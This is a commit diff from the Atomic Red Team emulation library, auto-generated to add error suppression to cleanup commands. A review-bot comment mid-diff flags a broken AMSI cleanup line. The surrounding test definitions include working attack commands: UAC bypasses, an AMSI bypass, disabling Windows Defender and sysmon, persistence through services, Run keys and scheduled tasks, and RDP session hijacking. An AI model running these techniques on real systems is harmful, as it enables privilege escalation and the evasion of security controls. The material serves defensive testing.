Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-04-08 18:49:16 +00:00
parent 23620c707a
commit 7d07686f60
10 changed files with 57 additions and 51 deletions
+36 -30
@@ -3216,8 +3216,8 @@ persistence:
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
cleanup_command: |
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
- name: Service Installation PowerShell
description: |
Installs A Local Service via PowerShell.
@@ -3885,7 +3885,7 @@ persistence:
'
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f
/V "Atomic Red Team" /f >nul 2>&1
'
- name: Reg Key RunOnce
@@ -3906,7 +3906,7 @@ persistence:
'
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f
/v 1 /f >nul 2>&1
'
- name: PowerShell Registry RunOnce
@@ -4059,7 +4059,7 @@ persistence:
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
@@ -4096,7 +4096,7 @@ persistence:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
@@ -5726,7 +5726,7 @@ defense-evasion:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
'
- name: Bypass UAC using Event Viewer (PowerShell)
@@ -5769,7 +5769,8 @@ defense-evasion:
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
'
- name: Bypass UAC using Fodhelper - PowerShell
@@ -5838,7 +5839,7 @@ defense-evasion:
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
T1191:
technique:
@@ -6773,7 +6774,7 @@ defense-evasion:
name: command_prompt
elevation_required: false
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name}
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
T1140:
@@ -7130,7 +7131,7 @@ defense-evasion:
command: 'sysmon -u
'
cleanup_command: 'sysmon -i -accepteula
cleanup_command: 'sysmon -i -accepteula >nul 2>&1
'
- name: AMSI Bypass - AMSI InitFailed
@@ -7143,7 +7144,8 @@ defense-evasion:
name: powershell
elevation_required: false
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
-ErrorAction Ignore\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
@@ -7158,7 +7160,7 @@ defense-evasion:
'
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
'
- name: Disable Arbitrary Security Windows Service
@@ -7180,8 +7182,8 @@ defense-evasion:
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
cleanup_command: |
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
- name: Disable PowerShell Script Block Logging
description: |
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
@@ -7248,8 +7250,8 @@ defense-evasion:
sc config WinDefend start=disabled
sc query WinDefend
cleanup_command: |
sc start WinDefend
sc config WinDefend start=enabled
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
- name: Tamper with Windows Defender Registry
description: |
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
@@ -11042,7 +11044,10 @@ defense-evasion:
. $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: Stop-Process -Name "#{spawnto_process_name}"
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
'
T1055:
technique:
x_mitre_permissions_required:
@@ -13753,7 +13758,7 @@ privilege-escalation:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
'
- name: Bypass UAC using Event Viewer (PowerShell)
@@ -13796,7 +13801,8 @@ privilege-escalation:
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
'
- name: Bypass UAC using Fodhelper - PowerShell
@@ -13865,7 +13871,7 @@ privilege-escalation:
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
T1038:
technique:
@@ -14652,8 +14658,8 @@ privilege-escalation:
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
cleanup_command: |
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
- name: Service Installation PowerShell
description: |
Installs A Local Service via PowerShell.
@@ -15369,7 +15375,7 @@ privilege-escalation:
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
@@ -15406,7 +15412,7 @@ privilege-escalation:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
@@ -23455,8 +23461,8 @@ execution:
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
cleanup_command: |
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
- name: PowerShell Downgrade Attack
description: 'Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
@@ -24094,7 +24100,7 @@ execution:
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
@@ -24131,7 +24137,7 @@ execution:
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
@@ -26423,7 +26429,7 @@ lateral-movement:
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
cleanup_command: 'sc.exe delete sesshijack
cleanup_command: 'sc.exe delete sesshijack >nul 2>&1
'
- name: RDPto-DomainController
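Review bot: In the `@@ -7143` hunk the AMSI cleanup now reads `...SetValue($null,$false) -ErrorAction Ignore`, but `-ErrorAction` is a cmdlet common parameter and has no meaning after a .NET method invocation, so PowerShell should reject the token at parse time and the statement that sets `amsiInitFailed` back to `$false` never executes, leaving the session's AMSI state as the test left it. The same line is reproduced in the generated markdown (the `@@ -420` hunk of the later file), so since this index is generator output the fix belongs in the source atomic's `cleanup_command`, for example wrapping the existing SetValue call as `try { <existing SetValue call> } catch { }`. More broadly, the blanket `>nul 2>&1` appended to cleanups that restore protections (`sc start WinDefend` / `sc config WinDefend start=enabled` in the `@@ -7248` hunk, `net.exe start #{service_name}` in the `@@ -7180` hunk) hides a failed restore from the operator; suppressing only stdout, or surfacing a non-zero `%ERRORLEVEL%`, would keep a host that is left with Defender or a security service disabled after a test from going unnoticed.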
+2 -2
@@ -40,8 +40,8 @@ sc.exe start #{service_name}
#### Cleanup Commands:
```cmd
sc.exe stop #{service_name}
sc.exe delete #{service_name}
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
```
+2 -2
@@ -68,7 +68,7 @@ SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
#### Cleanup Commands:
```cmd
SCHTASKS /Delete /TN spawn /F
SCHTASKS /Delete /TN spawn /F >nul 2>&1
```
@@ -107,7 +107,7 @@ SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
#### Cleanup Commands:
```cmd
SCHTASKS /Delete /TN "Atomic task" /F
SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
```
+2 -2
@@ -71,7 +71,7 @@ REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team
#### Cleanup Commands:
```cmd
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
```
@@ -106,7 +106,7 @@ REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v
#### Cleanup Commands:
```cmd
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
```
+1 -1
@@ -36,7 +36,7 @@ Upon execution, calc.exe will be opened.
#### Cleanup Commands:
```cmd
taskkill /F /IM #{process_name}
taskkill /F /IM #{process_name} >nul 2>&1
```
+1 -1
@@ -35,7 +35,7 @@ net start sesshijack
#### Cleanup Commands:
```cmd
sc.exe delete sesshijack
sc.exe delete sesshijack >nul 2>&1
```
+2 -2
@@ -349,8 +349,8 @@ iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Sof
#### Cleanup Commands:
```powershell
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
```
+3 -3
@@ -52,7 +52,7 @@ cmd.exe /c eventvwr.msc
#### Cleanup Commands:
```cmd
reg.exe delete hkcu\software\classes\mscfile /f
reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
```
@@ -123,7 +123,7 @@ fodhelper.exe
#### Cleanup Commands:
```cmd
reg.exe delete hkcu\software\classes\ms-settings /f
reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
```
@@ -232,7 +232,7 @@ mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
#### Cleanup Commands:
```cmd
rd "\\?\C:\Windows \" /S /Q
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
```
+7 -7
@@ -366,7 +366,7 @@ sysmon -u
#### Cleanup Commands:
```cmd
sysmon -i -accepteula
sysmon -i -accepteula >nul 2>&1
```
@@ -420,7 +420,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
#### Cleanup Commands:
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) -ErrorAction Ignore
```
@@ -449,7 +449,7 @@ Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-9
#### Cleanup Commands:
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
```
@@ -483,8 +483,8 @@ sc.exe config #{service_name} start= disabled
#### Cleanup Commands:
```cmd
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
```
@@ -612,8 +612,8 @@ sc query WinDefend
#### Cleanup Commands:
```cmd
sc start WinDefend
sc config WinDefend start=enabled
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
```
+1 -1
@@ -38,7 +38,7 @@ Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -
#### Cleanup Commands:
```powershell
Stop-Process -Name "#{spawnto_process_name}"
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
```